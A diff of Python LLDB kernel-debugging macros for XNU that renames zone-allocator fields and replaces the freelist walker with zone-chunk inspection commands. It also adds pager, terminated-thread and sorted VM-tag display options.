+        H - exhaustible
+        I - zone was destroyed and is no longer valid
+        L - zone is being monitored by zleaks
         M - gzalloc will avoid monitoring this zone
-        R - will be refilled when below low water mark
-        O - does not allow refill callout to fill zone on noblock allocation
         N - zone requires alignment (avoids padding this zone for debugging)
-        A - currently trying to allocate more backing memory from kernel_memory_allocate without VM priv
+        O - does not allow refill callout to fill zone on noblock allocation
+        R - will be refilled when below low water mark
         S - currently trying to allocate more backing memory from kernel_memory_allocate with VM priv
         W - another thread is waiting for more memory
-        E - Per-cpu caching is enabled for this zone
-        L - zone is being monitored by zleaks
-        G - currently running GC
-        I - zone was destroyed and is no longer valid
+        X - expandable
+        Z - elements are zeroed on free
     """
     global kern
 
     marks = [
             ["collectable",          "C"],
-            ["destructible",         "D"],
+            ["z_destructible",       "D"],
             ["expandable",           "X"],
-            ["noencrypt",            "$"],
+            ["z_noencrypt",          "$"],
             ["exhaustible",          "H"],
-            ["allows_foreign",       "F"],
-            ["prio_refill_count",    "R"],
+            ["z_allows_foreign",     "F"],
+            ["z_elems_rsv",          "R"],
             ["no_callout",           "O"],
             ["zleak_on",             "L"],
-            ["expanding_no_vm_priv", "A"],
-            ["expanding_vm_priv",    "S"],
-            ["waiting",              "W"],
-            ["cpu_cache_enabled",    "E"],
+            ["z_expander",           "A"],
+            ["z_expander_vm_priv",   "S"],
+            ["z_replenish_wait",     "W"],
+            ["z_pcpu_cache",         "E"],
             ["gzalloc_exempt",       "M"],
             ["alignment_required",   "N"],
-            ["va_sequester",         "!"]
+            ["z_va_sequester",       "!"],
+            ["z_free_zeroes",        "Z"]
             ]
+
     stats = {
-        "cur_size": 0, "used_size": 0, "free_size": 0,
+        "cur_size": 0, "used_size": 0, "cached_size": 0, "free_size": 0,
         "cur_pages": 0, "free_pages": 0, "seq_pages": 0
     }
 
@@ -694,7 +776,7 @@ def Zprint(cmd_args=None, cmd_options={}, O=None):
                 if zval.z_self:
                     print GetZoneSummary(zval, marks, stats)
 
-            format_string  = '{VT.Bold}{name:19s} {stats[cur_size]:11,d} {stats[used_size]:11,d} {stats[free_size]:11,d} '
+            format_string  = '{VT.Bold}{name:19s} {stats[cur_size]:11,d} {stats[used_size]:11,d} {stats[cached_size]:11,d} {stats[free_size]:11,d} '
             format_string += '                           '
             format_string += '{stats[cur_pages]:6,d} {stats[free_pages]:6,d}{VT.EndBold}  '
             format_string += '(sequester: {VT.Bold}{stats[seq_pages]:,d}{VT.EndBold})'
@@ -721,61 +803,7 @@ def TestZprint(kernel_target, config, lldb_obj, isConnected ):
 
 
 # EndMacro: zprint
-
-# Macro: showzfreelist
-
-def ShowZfreeListHeader(zone):
-    """ Helper routine to print a header for zone freelist.
-        (Since the freelist does not have a custom type, this is not defined as a Type Summary).
-        params:
-            zone:zone_t - Zone object to print header info
-        returns:
-            None
-    """
-
-    scaled_factor = (unsigned(kern.globals.zp_factor) +
-            (unsigned(zone.z_elem_size) >> unsigned(kern.globals.zp_scale)))
-
-    out_str = ""
-    out_str += "{0: <9s} {1: <12s} {2: <18s} {3: <18s} {4: <6s}\n".format('ELEM_SIZE', 'COUNT', 'NCOOKIE', 'PCOOKIE', 'FACTOR')
-    out_str += "{0: <9d} {1: <12d} 0x{2:0>16x} 0x{3:0>16x} {4: <2d}/{5: <2d}\n\n".format(
-                zone.z_elem_size, zone.countavail - zone.countfree, kern.globals.zp_nopoison_cookie, kern.globals.zp_poisoned_cookie, zone.zp_count, scaled_factor)
-    out_str += "{0: <7s} {1: <18s} {2: <18s} {3: <18s} {4: <18s} {5: <18s} {6: <14s}\n".format(
-                'NUM', 'ELEM', 'NEXT', 'BACKUP', '^ NCOOKIE', '^ PCOOKIE', 'POISON (PREV)')
-    print out_str
-
-def ShowZfreeListChain(zone, zfirst, zlimit):
-    """ Helper routine to print a zone free list chain
-        params:
-            zone: zone_t - Zone object
-            zfirst: void * - A pointer to the first element of the free list chain
-            zlimit: int - Limit for the number of elements to be printed by showzfreelist
-        returns:
-            None
-    """
-    current = Cast(zfirst, 'void *')
-    while ShowZfreeList.elts_found < zlimit:
-        ShowZfreeList.elts_found += 1
-        znext = dereference(Cast(current, 'vm_offset_t *'))
-        znext = (unsigned(znext) ^ unsigned(kern.globals.zp_nopoison_cookie))
-        znext = kern.GetValueFromAddress(znext, 'vm_offset_t *')
-        backup_ptr = kern.GetValueFromAddress((unsigned(Cast(current, 'vm_offset_t')) + unsigned(zone.z_elem_size) - sizeof('vm_offset_t')), 'vm_offset_t *')
-        backup_val = dereference(backup_ptr)
-        n_unobfuscated = (unsigned(backup_val) ^ unsigned(kern.globals.zp_nopoison_cookie))
-        p_unobfuscated = (unsigned(backup_val) ^ unsigned(kern.globals.zp_poisoned_cookie))
-        poison_str = ''
-        if p_unobfuscated == unsigned(znext):
-            poison_str = "P ({0: <d})".format(ShowZfreeList.elts_found - ShowZfreeList.last_poisoned)
-            ShowZfreeList.last_poisoned = ShowZfreeList.elts_found
-        else:
-            if n_unobfuscated != unsigned(znext):
-                poison_str = "INVALID"
-        print "{0: <7d} 0x{1:0>16x} 0x{2:0>16x} 0x{3:0>16x} 0x{4:0>16x} 0x{5:0>16x} {6: <14s}\n".format(
-              ShowZfreeList.elts_found, unsigned(current), unsigned(znext),
-              unsigned(backup_val), n_unobfuscated, p_unobfuscated, poison_str)
-        if unsigned(znext) == 0:
-            break
-        current = Cast(znext, 'void *')
+# Macro: showzchunks
 
 def ZoneIteratePageQueue(page):
     while page.packed_address:
@@ -783,42 +811,108 @@ def ZoneIteratePageQueue(page):
         yield meta
         page = meta.meta.zm_page_next
 
-@static_var('elts_found',0)
-@static_var('last_poisoned',0)
-@lldb_command('showzfreelist')
-def ShowZfreeList(cmd_args=None):
-    """ Walk the freelist for a zone, printing out the primary and backup next pointers, the poisoning cookies, and the poisoning status of each element.
-    Usage: showzfreelist <zone> [iterations]
+@header("{: <20s} {: <20s} {: <20s} {: <25s} {: <10s} {: <8s} {: <4s} {: >9s}".format(
+    "Zone", "Metadata", "Page", "Bitmap", "Kind", "Queue", "Pgs", "Allocs"))
+def GetZoneChunk(meta, queue, O=None):
+    format_string  = "{meta.zone: <#20x} "
+    format_string += "{meta.meta_addr: <#20x} {meta.page_addr: <#20x} "
+    format_string += "{bitmap: <#18x} @{bitmap_size:<5d} "
+    format_string += "{kind:<10s} {queue:<8s} {pgs:<1d}/{chunk:<1d}  "
+    format_string += "{alloc_count: >4d}/{avail_count: >4d}"
+
+    pgs = int(meta.zone.z_chunk_pages)
+    chunk = pgs
+    if meta.meta.zm_chunk_len >= 0xe:
+        kind = "secondary"
+        pgs -= int(meta.meta.zm_page_index)
+    else:
+        kind = "primary"
+
+    alloc_count=meta.getAllocCount()
+    avail_count=meta.getAllocAvail()
+    free_count=meta.getFreeCountSlow()
+
+    if alloc_count + free_count != avail_count:
+        format_string += " {VT.Red}bitmap mismatch{VT.Default}"
+
+    return O.format(format_string, meta=meta,
+            alloc_count=alloc_count,
+            avail_count=avail_count,
+            bitmap=meta.getBitmap(),
+            bitmap_size=meta.getBitmapSize(),
+            queue=queue, kind=kind, pgs=pgs, chunk=chunk)
+
+def ShowZChunksImpl(zone, extra_addr=None, cmd_options={}, O=None):
+    verbose = '-V' in cmd_options
+
+    def do_content(meta, O, indent=False):
+        with O.table("{:>5s}  {:<20s} {:<10s}".format("#", "Element", "State"), indent=indent):
+            i = 0
+            for e in meta.iterateElements():
+                status = "Allocated"
+                if meta.isElementFree(e):
+                    status = "Free"
+                print O.format("{:5d}  {:<#20x} {:10s}", i, e, status)
+                i += 1
+
+    if extra_addr is None:
+        with O.table(GetZoneChunk.header):
+            for meta in ZoneIteratePageQueue(zone.z_pageq_full):
+                print GetZoneChunk(meta, "full", O)
+                if verbose: do_content(meta, O, indent=True);
+
+            for meta in ZoneIteratePageQueue(zone.z_pageq_partial):
+                print GetZoneChunk(meta, "partial", O)
+                if verbose: do_content(meta, O, indent=True);
+
+            for meta in ZoneIteratePageQueue(zone.z_pageq_empty):
+                print GetZoneChunk(meta, "empty", O)
+                if verbose: do_content(meta, O, indent=True);
+
+            for meta in ZoneIteratePageQueue(zone.z_pageq_va):
+                print GetZoneChunk(meta, "va", O)
+    else:
+        meta = ZoneMeta(extra_addr, isPageIndex="-I" in cmd_options).getReal()
+        with O.table(GetZoneChunk.header):
+            print GetZoneChunk(meta, "N/A", O)
+        do_content(meta, O)
+
+@lldb_command('showzchunks', "IV", fancy=True)
+def ShowZChunks(cmd_args=None, cmd_options={}, O=None):
+    """
+    prints the list of zone chunks, or the content of a given chunk
+
+    Usage: showzchunks <zone> [-I] [-V] [address]
+
+    Use -I       to interpret [address] as a page index
+    Use -V       to show the contents of all the chunks
 
-        Will walk up to 50 elements by default, pass a limit in 'iterations' to override.
+    [address]    can by any address belonging to the zone, or metadata
     """
+
     if not cmd_args:
-        print ShowZfreeList.__doc__
-        return
-    ShowZfreeList.elts_found = 0
-    ShowZfreeList.last_poisoned = 0
+        return O.error('missing zone argument')
 
     zone = kern.GetValueFromAddress(cmd_args[0], 'struct zone *')
-    zlimit = 50
-    if len(cmd_args) >= 2:
-        zlimit = ArgumentStringToInt(cmd_args[1])
-    ShowZfreeListHeader(zone)
 
-    for head in [zone.pages_any_free_foreign, zone.pages_intermediate, zone.pages_all_free]:
-        for free_page_meta in ZoneIteratePageQueue(head):
-            if ShowZfreeList.elts_found == zlimit:
-                break
-            zfirst = free_page_meta.getFreeList()
-            if zfirst != 0:
-                ShowZfreeListChain(zone, zfirst, zlimit)
-
-    if ShowZfreeList.elts_found == zlimit:
-        print "Stopped at {0: <d} elements!".format(zlimit)
+    if len(cmd_args) == 1:
+        ShowZChunksImpl(zone, cmd_options=cmd_options, O=O)
     else:
-        print "Found {0: <d} elements!".format(ShowZfreeList.elts_found)
+        addr = unsigned(kern.GetValueFromAddress(cmd_args[1]))
+        ShowZChunksImpl(zone, extra_addr=addr, cmd_options=cmd_options, O=O)
+
+@lldb_command('showallzchunks', fancy=True)
+def ShowAllZChunks(cmd_args=None, cmd_options={}, O=None):
+    """
+    prints the list of all zone chunks
+
+    Usage: showallzchunks
+    """
 
-# EndMacro: showzfreelist
+    for z in kern.zones:
+        ShowZChunksImpl(z, O=O)
 
+# EndMacro: showzchunks
 # Macro: zstack_showzonesbeinglogged
 
 @lldb_command('zstack_showzonesbeinglogged')
@@ -1338,7 +1432,7 @@ def ShowPCPU(cmd_args=None, cmd_options={}, O=None):
     ty  = var.GetSBValue().GetTypeName()
 
     r = range(0, ncpu)
-    if cpu:
+    if cpu is not None:
         r = range(cpu, cpu + 1)
 
     def PCPUSlot(pcpu_var, i):
@@ -3438,6 +3532,7 @@ FixedTags = {
     26: "VM_KERN_MEMORY_SKYWALK",
     27: "VM_KERN_MEMORY_LTABLE",
     28: "VM_KERN_MEMORY_HV",
+    29: "VM_KERN_MEMORY_RETIRED",
     255:"VM_KERN_MEMORY_ANY",
 }
 
@@ -3461,17 +3556,19 @@ def GetVMKernName(tag):
                 return (kern.Symbolicate(site), "")
     return ("", "")
 
-@lldb_command("showvmtags", "ASJ")
+@lldb_command("showvmtags", "ASJO")
 def showvmtags(cmd_args=None, cmd_options={}):
     """Routine to print out info about kernel wired page allocations
         usage: showvmtags
                iterates kernel map and vm objects totaling allocations by tag.
-        usage: showvmtags -S
+        usage: showvmtags -S [-O]
                also iterates kernel object pages individually - slow.
-        usage: showvmtags -A
+        usage: showvmtags -A [-O]
                show all tags, even tags that have no wired count
-        usage: showvmtags -J
+        usage: showvmtags -J [-O]
                 Output json
+
+        -O: list in increasing size order
     """
     slow = False
     print_json = False
@@ -3486,7 +3583,6 @@ def showvmtags(cmd_args=None, cmd_options={}):
     page_size = unsigned(kern.globals.page_size)
     nsites = unsigned(kern.globals.vm_allocation_tag_highest) + 1
     tagcounts = [0] * nsites
-    tagpeaks = [0] * nsites
     tagmapped = [0] * nsites
 
     if kern.globals.vm_tag_active_update:
@@ -3495,7 +3591,6 @@ def showvmtags(cmd_args=None, cmd_options={}):
             if site:
                 tagcounts[tag] = unsigned(site.total)
                 tagmapped[tag] = unsigned(site.mapped)
-                tagpeaks[tag] = unsigned(site.peak)
     else:
         queue_head = kern.globals.vm_objects_wired
         for object in IterateQueue(queue_head, 'struct vm_object *', 'wired_objq'):
@@ -3516,7 +3611,6 @@ def showvmtags(cmd_args=None, cmd_options={}):
             current["name"] = sitestr
             current["size"] = tagcounts[tag]
             current["mapped"] = tagmapped[tag]
-            current["peak"] = tagpeaks[tag]
             current["tag"] = tag
             current["tagstr"] = tagstr
             current["subtotals"] = []
@@ -3537,24 +3631,27 @@ def showvmtags(cmd_args=None, cmd_options={}):
                     })
             tags.append(current)
 
+    if "-O" in cmd_options:
+        tags.sort(key = lambda tag: tag['size'])
+
     if print_json:
         print json.dumps(tags)
     else:
         print " vm_allocation_tag_highest: {:<7d}  ".format(nsites - 1)
-        print " {:<7s}  {:>7s}   {:>7s}   {:>7s}  {:<50s}".format("tag.kmod", "peak", "size", "mapped", "name")
+        print " {:<7s}  {:>7s}   {:>7s}  {:<50s}".format("tag.kmod", "size", "mapped", "name")
         for tag in tags:
             if not tagstr:
                 tagstr = ""
-            print " {:>3d}{:<4s}  {:>7d}K  {:>7d}K  {:>7d}K  {:<50s}".format(tag["tag"], tag["tagstr"], tag["peak"] / 1024, tag["size"] / 1024, tag["mapped"] / 1024, tag["name"])
+            print " {:>3d}{:<4s}  {:>7d}K  {:>7d}K  {:<50s}".format(tag["tag"], tag["tagstr"], tag["size"] / 1024, tag["mapped"] / 1024, tag["name"])
             for sub in tag["subtotals"]:
                 if ((sub["flags"] & 0x007f) == 0):
                     kind_str = "named"
                 else:
                     kind_str = "from"
 
-                print " {:>7s}  {:>7s}   {:>7s}   {:>7d}K      {:s} {:>3d}{:<4s} {:<50s}".format(" ", " ", " ", sub["amount"] / 1024, kind_str, sub["tag"], sub["tagstr"], sub["sitestr"])
+                print " {:>7s}  {:>7d}K      {:s}  {:>3d}{:<4s} {:<50s}".format(" ", sub["amount"] / 1024, kind_str, sub["tag"], sub["tagstr"], sub["sitestr"])
 
-        print "Total:              {:>7d}K  {:>7d}K".format(total / 1024, totalmapped / 1024)
+        print "Total:    {:>7d}K  {:>7d}K".format(total / 1024, totalmapped / 1024)
     return None
 
 
@@ -3759,22 +3856,14 @@ def ShowAllocatedElementsInZone(cmd_args=None, cmd_options={}):
 def FindAllocatedElementsInZone(zone):
     elements = []
 
-    if not zone.z_self or zone.permanent:
+    if not zone.z_self or zone.z_permanent:
         return elements
 
-    for head in [zone.pages_any_free_foreign, zone.pages_all_used_foreign,
-            zone.pages_intermediate, zone.pages_all_used]:
-
+    for head in [zone.z_pageq_partial, zone.z_pageq_full]:
         for meta in ZoneIteratePageQueue(head):
-            free_elements = set(meta.iterateFreeList())
-
             for elem in meta.iterateElements():
-                if elem in free_elements:
-                    continue
-
-                if elem not in free_elements:
+                if not meta.isElementFree(elem):
                     elements.append(elem)
-                elem += zone.z_elem_size
 
     return elements
 
@@ -4145,7 +4234,7 @@ def ShowAllAppleProtectPagers(cmd_args=None):
     """Routine to print all apple_protect pagers
         usage: show_all_apple_protect_pagers
     """
-    print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "mo_control", "object", "offset", "crypto_offset", "crypto_start", "crypto_end")
+    print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "cached", "object", "offset", "crypto_offset", "crypto_start", "crypto_end")
     qhead = kern.globals.apple_protect_pager_queue
     qtype = GetType('apple_protect_pager *')
     qcnt = kern.globals.apple_protect_pager_count
@@ -4173,7 +4262,56 @@ def show_apple_protect_pager(pager, qcnt, idx):
         shadow = object.shadow
     vnode_pager = Cast(object.pager,'vnode_pager *')
     filename = GetVnodePath(vnode_pager.vnode_handle)
-    print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {: <#018x} {: <#018x} {:#018x} {:#018x} {:#018x} {:#018x}\n\tcrypt_info:{: <#018x} <decrypt:{: <#018x} end:{:#018x} ops:{: <#018x} refs:{:<d}>\n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, pager.ref_count, pager.is_ready, pager.is_mapped, pager.pager_control, pager.backing_object, pager.backing_offset, pager.crypto_backing_offset, pager.crypto_start, pager.crypto_end, pager.crypt_info, pager.crypt_info.page_decrypt, pager.crypt_info.crypt_end, pager.crypt_info.crypt_ops, pager.crypt_info.crypt_refcnt, vnode_pager.vnode_handle, filename)
+    if hasattr(pager, "ap_pgr_hdr_ref"):
+        refcnt = pager.ap_pgr_hdr_ref
+    else:
+        refcnt = pager.ap_pgr_hdr.mo_ref
+    print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {:>6d} {: <#018x} {:#018x} {:#018x} {:#018x} {:#018x}\n\tcrypt_info:{: <#018x} <decrypt:{: <#018x} end:{:#018x} ops:{: <#018x} refs:{:<d}>\n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, refcnt, pager.is_ready, pager.is_mapped, pager.is_cached, pager.backing_object, pager.backing_offset, pager.crypto_backing_offset, pager.crypto_start, pager.crypto_end, pager.crypt_info, pager.crypt_info.page_decrypt, pager.crypt_info.crypt_end, pager.crypt_info.crypt_ops, pager.crypt_info.crypt_refcnt, vnode_pager.vnode_handle, filename)
+    showvmobject(pager.backing_object, pager.backing_offset, pager.crypto_end - pager.crypto_start, 1, 1)
+
+@lldb_command("show_all_shared_region_pagers")
+def ShowAllSharedRegionPagers(cmd_args=None):
+    """Routine to print all shared_region pagers
+        usage: show_all_shared_region_pagers
+    """
+    print "{:>3s} {:<3s} {:<18s} {:>5s} {:>5s} {:>6s} {:<18s} {:<18s} {:<18s} {:<18s}\n".format("#", "#", "pager", "refs", "ready", "mapped", "object", "offset", "jop_key", "slide", "slide_info")
+    qhead = kern.globals.shared_region_pager_queue
+    qtype = GetType('shared_region_pager *')
+    qcnt = kern.globals.shared_region_pager_count
+    idx = 0
+    for pager in IterateQueue(qhead, qtype, "srp_queue"):
+        idx = idx + 1
+        show_shared_region_pager(pager, qcnt, idx)
+
+@lldb_command("show_shared_region_pager")
+def ShowSharedRegionPager(cmd_args=None):
+    """Routine to print out info about a shared_region pager
+        usage: show_shared_region_pager <pager>
+    """
+    if cmd_args == None or len(cmd_args) < 1:
+        print "Invalid argument.", ShowSharedRegionPager.__doc__
+        return
+    pager = kern.GetValueFromAddress(cmd_args[0], 'shared_region_pager_t')
+    show_shared_region_pager(pager, 1, 1)
+
+def show_shared_region_pager(pager, qcnt, idx):
+    object = pager.srp_backing_object
+    shadow = object.shadow
+    while shadow != 0:
+        object = shadow
+        shadow = object.shadow
+    vnode_pager = Cast(object.pager,'vnode_pager *')
+    filename = GetVnodePath(vnode_pager.vnode_handle)
+    if hasattr(pager, 'srp_ref_count'):
+        ref_count = pager.srp_ref_count
+    else:
+        ref_count = pager.srp_header.mo_ref
+    if hasattr(pager, 'srp_jop_key'):
+        jop_key = pager.srp_jop_key
+    else:
+        jop_key = -1
+    print "{:>3}/{:<3d} {: <#018x} {:>5d} {:>5d} {:>6d} {: <#018x} {:#018x} {:#018x} {:#018x}\n\tvnode:{: <#018x} {:s}\n".format(idx, qcnt, pager, ref_count, pager.srp_is_ready, pager.srp_is_mapped, pager.srp_backing_object, pager.srp_backing_offset, jop_key, pager.srp_slide_info.si_slide, pager.srp_slide_info, vnode_pager.vnode_handle, filename)
+    showvmobject(pager.srp_backing_object, pager.srp_backing_offset, pager.srp_slide_info.si_end - pager.srp_slide_info.si_start, 1, 1)
 
 @lldb_command("show_console_ring")
 def ShowConsoleRingData(cmd_args=None):
@@ -4545,36 +4683,6 @@ def vm_page_lookup_in_compressor(slot_ptr):
     else:
         print "<no compressed data>"
 
-def print_hex_data(data, begin_offset=0, desc=""):
-    """ print on stdout "hexdump -C < data" like output
-        params:
-            data - bytearray or array of int where each int < 255
-            begin_offset - int offset that should be printed in left column
-            desc - str optional description to print on the first line to describe data
-    """
-    if desc:
-        print "{}:".format(desc)
-    index = 0
-    total_len = len(data)
-    hex_buf = ""
-    char_buf = ""
-    while index < total_len:
-        hex_buf += " {:02x}".format(data[index])
-        if data[index] < 0x20 or data[index] > 0x7e:
-            char_buf += "."
-        else:
-            char_buf += "{:c}".format(data[index])
-        index += 1
-        if index and index % 8 == 0:
-            hex_buf += " "
-        if index > 1 and (index % 16) == 0:
-            print "{:08x} {: <50s} |{: <16s}|".format(begin_offset + index - 16, hex_buf, char_buf)
-            hex_buf = ""
-            char_buf = ""
-    if index % 16 != 0:
-        print "{:08x} {: <50s} |{: <16s}|".format(begin_offset + index - 16, hex_buf, char_buf)
-    return
-
 @lldb_command('vm_scan_all_pages')
 def VMScanAllPages(cmd_args=None):
     """Scans the vm_pages[] array
index c7d5f493ce6f4ca731c3c3666b4473a6ccbfa1e0..6bab4e27c6124055b940765df3c06191fdcbc145 100755 (executable)
@@ -11,6 +11,7 @@ import time
 import xnudefines
 import memory
 import json
+from collections import defaultdict
 
 def GetProcName(proc):
     """ returns a string name of the process. Longer variant is preffered if provided.
@@ -26,17 +27,25 @@ def GetProcName(proc):
         return str(proc.p_comm)
 
 def GetProcNameForTask(task):
-    """ returns a string name of the process. if proc is not valid "unknown" is returned
+    """ returns a string name of the process. If proc is not valid the proc
+        name is looked up in the associated importance structure (if
+        available). If no name can be found, "unknown"  is returned.
         params:
             task: value object represeting a task in the kernel.
         returns:
             str : A string name of the process linked to the task
     """
-    if not task or not unsigned(task.bsd_info):
-        return "unknown"
-    p = Cast(task.bsd_info, 'proc *')
+    if task:
+        if unsigned(task.bsd_info):
+            p = Cast(task.bsd_info, 'proc *')
+            return GetProcName(p)
+
+        if (hasattr(task, 'task_imp_base') and
+           hasattr(task.task_imp_base, 'iit_procname') and
+           unsigned(task.task_imp_base) != 0):
+            return str(task.task_imp_base.iit_procname)
 
-    return GetProcName(p)
+    return "unknown"
 
 def GetProcPIDForTask(task):
     """ returns a int pid of the process. if the proc is not valid, val[5] from audit_token is returned.
@@ -187,6 +196,7 @@ def GetASTSummary(ast):
         K - AST_KPERF
         M - AST_MACF
         r - AST_RESET_PCS
+        a - AST_ARCADE
         G - AST_GUARD
         T - AST_TELEMETRY_USER
         T - AST_TELEMETRY_KERNEL
@@ -201,12 +211,12 @@ def GetASTSummary(ast):
     out_string = ""
     state = int(ast)
     thread_state_chars = {0x0:'', 0x1:'P', 0x2:'Q', 0x4:'U', 0x8:'H', 0x10:'Y', 0x20:'A',
-                          0x40:'L', 0x80:'B', 0x100:'K', 0x200:'M', 0x400: 'r',
+                          0x40:'L', 0x80:'B', 0x100:'K', 0x200:'M', 0x400: 'r', 0x800: 'a',
                           0x1000:'G', 0x2000:'T', 0x4000:'T', 0x8000:'T', 0x10000:'S',
                           0x20000: 'D', 0x40000: 'I', 0x80000: 'E', 0x100000: 'R', 0x200000: 'N'}
     state_str = ''
     mask = 0x1
-    while mask <= 0x80000:
+    while mask <= 0x200000:
         state_str += thread_state_chars[int(state & mask)]
         mask = mask << 1
 
@@ -583,7 +593,7 @@ def GetThreadGroupSummary(tg):
         tg_flags += 'E'
     if (tg.tg_flags & 0x2):
         tg_flags += 'U'
-    out_string += format_string.format(tg, tg.tg_id, tg.tg_name, tg.tg_refcount, tg_flags, tg.tg_recommendation)
+    out_string += format_string.format(tg, tg.tg_id, tg.tg_name, tg.tg_refcount.ref_count, tg_flags, tg.tg_recommendation)
     return out_string
 
 @lldb_command('showallthreadgroups')
@@ -1052,8 +1062,20 @@ def ShowTerminatedTasks(cmd_args=None):
     global kern
     print GetTaskSummary.header + " " + GetProcSummary.header
     for t in kern.terminated_tasks:
+
+        # If the task has been terminated it's likely that the process is
+        # gone too. If there is no proc it may still be possible to find
+        # the original proc name.
         pval = Cast(t.bsd_info, 'proc *')
-        print GetTaskSummary(t) +" "+ GetProcSummary(pval)
+        if pval:
+            psummary = GetProcSummary(pval)
+        else:
+            name = GetProcNameForTask(t);
+            pslen = GetProcSummary.header.find("command");
+            psummary = "{0: <{indent}} {1: <s}".format("", name, indent = pslen - 1)
+
+        print GetTaskSummary(t) + " " + psummary
+
     return True
 
 # Macro: showtaskstacks
@@ -1166,15 +1188,41 @@ def ShowProcRefs(cmd_args = None):
 def ShowAllThreads(cmd_args = None):
     """ Display info about all threads in the system
     """
+
+    # Terminated threads get prefixed with a 'T'
+    def ShowTaskTerminatedThreads(task):
+        tlist = tmap.get(unsigned(task), [])
+        for thval in tlist:
+            print "T\t" + GetThreadSummary(thval)
+
+    # Task -> [thread, ..] map of terminated threads
+    tmap = defaultdict(list)
+    for thr in kern.terminated_threads:
+        tmap[unsigned(thr.task)].append(thr)
+
     for t in kern.tasks:
         ShowTaskThreads([str(int(t))])
+        ShowTaskTerminatedThreads(t)
         print " \n"
-        
+
     for t in kern.terminated_tasks:
         print "Terminated: \n"
         ShowTaskThreads([str(int(t))])
+        ShowTaskTerminatedThreads(t)
         print " \n"
-        
+
+    return
+
+@lldb_command('showterminatedthreads')
+def ShowTerminatedThreads(cmd_args=None):
+    """ Display info about all terminated threads in the system
+    """
+
+    global kern
+    print GetThreadSummary.header
+    for t in kern.terminated_threads:
+        print GetThreadSummary(t)
+
     return
 
 @lldb_command('showtaskthreads', "F:")
@@ -1346,7 +1394,7 @@ def GetFullBackTrace(frame_addr, verbosity = vHUMAN, prefix = ""):
         if (not kern.arch.startswith('arm') and frame_ptr < mh_execute_addr) or (kern.arch.startswith('arm') and frame_ptr > mh_execute_addr):
             break
         pc_val = kern.GetValueFromAddress(frame_ptr + kern.ptrsize,'uintptr_t *')
-        pc_val = unsigned(dereference(pc_val))
+        pc_val = kern.StripKernelPAC(unsigned(dereference(pc_val)))
         out_string += prefix + GetSourceInformationForAddress(pc_val) + "\n"
         bt_count +=1
         previous_frame_ptr = frame_ptr
index 6039f204833ac91e7824e6ddf58c9a19e8f47338..b726867d58b83fc67fcf0b1fc749633c67cf3801 100755 (executable)
@@ -305,25 +305,38 @@ def WriteInt8ToMemoryAddress(intval, addr):
     return False 
 
 _enum_cache = {}
-def GetEnumValue(name):
+def GetEnumValue(enum_name_or_combined, member_name = None):
     """ Finds the value of a particular enum define. Ex kdp_req_t::KDP_VERSION  => 0x3
         params:
-            name : str - name of enum in the format type::name
+            enum_name_or_combined: str
+                name of an enum of the format type::name (legacy)
+                name of an enum type
+            member_name: None, or the name of an enum member
+                   (then enum_name_or_combined is a type name).
         returns:
             int - value of the particular enum.
         raises:
             TypeError - if the enum is not found
     """
-    name = name.strip()
     global _enum_cache
-    if name not in _enum_cache:
-        res = lldb.SBCommandReturnObject()
-        lldb.debugger.GetCommandInterpreter().HandleCommand("p/x (`%s`)" % name, res)
-        if not res.Succeeded():
-            raise TypeError("Enum not found with name: " + name)
-        # the result is of format '(int) $481 = 0x00000003\n'
-        _enum_cache[name] = int( res.GetOutput().split('=')[-1].strip(), 16)
-    return _enum_cache[name]
+    if member_name is None:
+        enum_name, member_name = enum_name_or_combined.strip().split("::")
+    else:
+        enum_name = enum_name_or_combined
+
+    if enum_name not in _enum_cache:
+        ty = GetType(enum_name)
+        d  = {}
+
+        for e in ty.get_enum_members_array():
+            if ty.GetTypeFlags() & lldb.eTypeIsSigned:
+                d[e.GetName()] = e.GetValueAsSigned()
+            else:
+                d[e.GetName()] = e.GetValueAsUnsigned()
+
+        _enum_cache[enum_name] = d
+
+    return _enum_cache[enum_name][member_name]
 
 def ResolveFSPath(path):
     """ expand ~user directories and return absolute path.
@@ -442,12 +455,13 @@ def IsAppleInternal():
         retval = False
     return retval
 
-def print_hex_data(data, begin_offset=0, desc=""):
+def print_hex_data(data, begin_offset=0, desc="", marks={}):
     """ print on stdout "hexdump -C < data" like output
         params:
             data - bytearray or array of int where each int < 255
             begin_offset - int offset that should be printed in left column
             desc - str optional description to print on the first line to describe data
+            mark - dictionary of markers
     """
     if desc:
         print "{}:".format(desc)
@@ -456,7 +470,11 @@ def print_hex_data(data, begin_offset=0, desc=""):
     hex_buf = ""
     char_buf = ""
     while index < total_len:
-        hex_buf += " {:02x}".format(data[index])
+        if marks.has_key(begin_offset + index):
+            hex_buf += marks[begin_offset + index]
+            hex_buf += "{:02x}".format(data[index])
+        else:
+            hex_buf += " {:02x}".format(data[index])
         if data[index] < 0x20 or data[index] > 0x7e:
             char_buf += "."
         else:
index d935362abe8c0ea7a31249ee6fb03e2e433ff0fc..ce5997b5efed37be4e52d43dfa59383821eebf6d 100755 (executable)
@@ -284,7 +284,7 @@ def GetObjectAtIndexFromArray(array_base, index):
     base_address = array_base_val.GetValueAsUnsigned()
     size = array_base_val.GetType().GetPointeeType().GetByteSize()
     obj_address = base_address + (index * size)
-    obj = kern.GetValueFromAddress(obj_address, array_base_val.GetType().GetName())
+    obj = kern.GetValueFromAddress(obj_address, array_base_val.GetType())
     return Cast(obj, array_base_val.GetType())
 
 
@@ -1169,7 +1169,35 @@ def TrapTrace_cmd(cmd_args=[], cmd_options={}):
 
     Trace_cmd(cmd_args, cmd_options, hdrString, entryString, kern.globals.traptrace_ring,
         kern.globals.traptrace_entries_per_cpu, MAX_TRAPTRACE_BACKTRACES)
-                
+
+# Yields an iterator over all the sysctls from the provided root.
+# Can optionally filter by the given prefix
+def IterateSysctls(root_oid=kern.globals.sysctl__children, prefix="", depth = 0, parent = ""):
+    headp = root_oid
+    for pp in IterateListEntry(headp, 'struct sysctl_oid *', 'oid_link', 's'):
+        node_str = ""
+        if prefix != "":
